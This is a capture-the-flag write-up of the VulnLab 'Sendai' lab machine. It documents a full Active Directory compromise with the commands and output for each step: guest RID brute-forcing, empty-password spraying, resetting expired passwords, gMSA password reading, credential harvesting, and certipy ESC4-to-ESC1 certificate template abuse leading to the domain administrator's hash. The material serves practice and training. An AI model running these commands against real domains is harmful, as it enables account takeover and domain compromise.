VulnLab - Sendai Writeup

👾 Machine Overview

This is a writeup of the machine Sendai from VulnLab , it’s a medium difficulty Windows machine which featured a pretty straightforward AD path, and ESC4 .

🔍 Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC -Pn 10.10.87.215
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 15:58 EDT
Nmap scan report for 10.10.87.215
Host is up (0.099s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 19:59:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after:  2024-07-10T09:24:23
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after:  2024-07-18T00:00:00
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after:  2024-07-10T09:24:23
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after:  2024-07-10T09:24:23
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after:  2024-07-10T09:24:23
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-09-28T19:56:10
|_Not valid after:  2025-03-30T19:56:10
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SENDAI
|   NetBIOS_Domain_Name: SENDAI
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sendai.vl
|   DNS_Computer_Name: dc.sendai.vl
|   DNS_Tree_Name: sendai.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-29T19:59:48+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-29T19:59:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.34 seconds

I started off by adding dc.sendai.vl and sendai.vl to my /etc/hosts.

Next, I checked out the webpage which was default IIS, gobusting with big.txt didn’t reveal anything interesting, and I checked out subdomains/vhosts.

There wasn’t any anonymous LDAP, but I was able to authenticate to SMB as Guest, running RID brute.

nxc smb dc.sendai.vl --rid-brute -u Guest -p ""
SMB         10.10.87.215    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         10.10.87.215    445    DC               [+] sendai.vl\Guest: 
SMB         10.10.87.215    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.87.215    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         10.10.87.215    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         10.10.87.215    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         10.10.87.215    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         10.10.87.215    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         10.10.87.215    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         10.10.87.215    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         10.10.87.215    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         10.10.87.215    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         10.10.87.215    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         10.10.87.215    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         10.10.87.215    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.87.215    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.87.215    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.87.215    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         10.10.87.215    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         10.10.87.215    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.87.215    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.87.215    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.87.215    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.87.215    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         10.10.87.215    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         10.10.87.215    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.87.215    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         10.10.87.215    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         10.10.87.215    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         10.10.87.215    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         10.10.87.215    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         10.10.87.215    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         10.10.87.215    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         10.10.87.215    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         10.10.87.215    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         10.10.87.215    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         10.10.87.215    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         10.10.87.215    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         10.10.87.215    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         10.10.87.215    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         10.10.87.215    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         10.10.87.215    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         10.10.87.215    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         10.10.87.215    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         10.10.87.215    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         10.10.87.215    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         10.10.87.215    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         10.10.87.215    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         10.10.87.215    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         10.10.87.215    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         10.10.87.215    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         10.10.87.215    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         10.10.87.215    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         10.10.87.215    445    DC               1131: SENDAI\support (SidTypeGroup)

This got us a list of users that I tried ASREPRoasting to no avail.

📂 SMB

I authenticated to SMB as the guest account to checkout available shares.

smbclient -L \\\\dc.sendai.vl\\ -U "guest"

Password for [WORKGROUP\guest]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	config          Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	sendai          Disk      company share
	SYSVOL          Disk      Logon server share 
	Users           Disk      
SMB1 disabled -- no workgroup available

config, sendai, and Users, all look interesting. I started off by checking out the sendai share.

smb: \> dir
  .                                   D        0  Tue Jul 18 13:31:04 2023
  ..                                DHS        0  Wed Jul 19 10:11:25 2023
  hr                                  D        0  Tue Jul 11 08:58:19 2023
  incident.txt                        A     1372  Tue Jul 18 13:34:15 2023
  it                                  D        0  Tue Jul 18 09:16:46 2023
  legal                               D        0  Tue Jul 11 08:58:23 2023
  security                            D        0  Tue Jul 18 09:17:35 2023
  transfer                            D        0  Tue Jul 11 09:00:20 2023

There’s several documents in here, but the only real noteworthy one contained some information about weak passwords.

🪦 Expired Passwords

Dear valued employees,

We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.

To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.

We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.

If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.

Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.

The note says that due to the pervasive use of weak passwords, all accounts with a bad password would have their password expired. To check for this, I sprayed an empty password at our userlist.

nxc smb dc.sendai.vl --rid-brute -u user.list -p "" --continue-on-success

This got us the following accounts:

Elliot.Yates
Thomas.Powell

We’re able to use Impacket’s smbpasswd.py to reset both of these passwords.

❯ smbpasswd.py [email protected] -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
❯ smbpasswd.py [email protected] -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

🧔 User

Now with our new user, I ran bloodhound-python to remotely gather data.

It looks like both of our users are in the Support group, which has a clear path to user on the DC. We’ll need to add our user to the admsvc group and then read the GMSA password on mgtsvc.

First, we need to add our user to the admsvc group.

net rpc group addmem "ADMSVC" "thomas.powell" -U "SENDAI.VL"/"thomas.powell"%"Password123" -S sendai.vl

Next, we can use bloodyAD to read the GMSA password of the mgtsvc account.

bloodyAD --host sendai.vl -d "sendai.vl" -u "Thomas.Powell" -p "Password123" get object MGTSVC$ --attr msDS-ManagedPassword

🏆 Root

Now, we can login as MGTSVC on the DC.

I started out by checking out our groups and privileges, not seeing anything super cool.

We’re now able to view C:\config, which had an interesting .sqlconfig file.

Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=[SNIPPED];

I took the password from this file, and sprayed it at our userlist.

nxc smb sendai.vl -u user.list -p [PASSWORD] --continue-on-success

This got us creds for the sqlsvc account. I think our two paths forward are either through SQL, or ADCS, as there’s an interesting CA-Operators group in AD.

The two users in this group are anthony.smith, and clifford.davey. I ran certipy find to see if there’s any vulnerable certificate templates.

certipy find -vulnerable -username [email protected] -password [PASS] -dc-ip [DC IP]

It looks like the SendaiComputer template is vulnerable to ESC4 .

"Certificate Templates": {
    "0": {
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",
      "Certificate Authorities": [
        "sendai-DC-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": false,
      "Certificate Name Flag": [
        "SubjectAltRequireDns"
      ],
      "Enrollment Flag": [
        "AutoEnrollment"
      ],
      "Private Key Flag": [
        "16842752"
      ],
      "Extended Key Usage": [
        "Server Authentication",
        "Client Authentication"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "100 years",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 4096,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "SENDAI.VL\\Domain Admins",
            "SENDAI.VL\\Domain Computers",
            "SENDAI.VL\\Enterprise Admins"
          ]
        },
        "Object Control Permissions": {
          "Owner": "SENDAI.VL\\Administrator",
          "Full Control Principals": [
            "SENDAI.VL\\ca-operators"
          ],
          "Write Owner Principals": [
            "SENDAI.VL\\Domain Admins",
            "SENDAI.VL\\Enterprise Admins",
            "SENDAI.VL\\Administrator",
            "SENDAI.VL\\ca-operators"
          ],
          "Write Dacl Principals": [
            "SENDAI.VL\\Domain Admins",
            "SENDAI.VL\\Enterprise Admins",
            "SENDAI.VL\\Administrator",
            "SENDAI.VL\\ca-operators"
          ],
          "Write Property Principals": [
            "SENDAI.VL\\Domain Admins",
            "SENDAI.VL\\Enterprise Admins",
            "SENDAI.VL\\Administrator",
            "SENDAI.VL\\ca-operators"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"
      }

If we can compromise a CA-Operator, we can rewrite this template to make it vulnerable to ESC1.

I ran PrivEscCheck to see if we could find credentials for a CA-Operator.

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

[SNIPPED]
Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p [SNIPPED] -k netsvcs
User        : LocalSystem
StartMode   : Automatic

We’re able to see the password for clifford.davey used as a CLI argument for C:\Windows\helpdesk.exe. Now we can exploit the vulnerable template.

# Make template vuln to ESC1
certipy template -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -template SendaiComputer -save-old

# Exploit ESC1
certipy req -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn [email protected]

# Auth w ticket
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sendai.vl' -dc-ip 10.10.114.72

# Restore config - clean up
certipy template -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -template SendaiComputer -configuration SendaiComputer.json

Now, we have the admin’s hash and can WinRM in to grab the flag, YIPPEE!

📖 Resources

🔗 Hyperlink	ℹ️ Info
Cybersec Notes	ESC4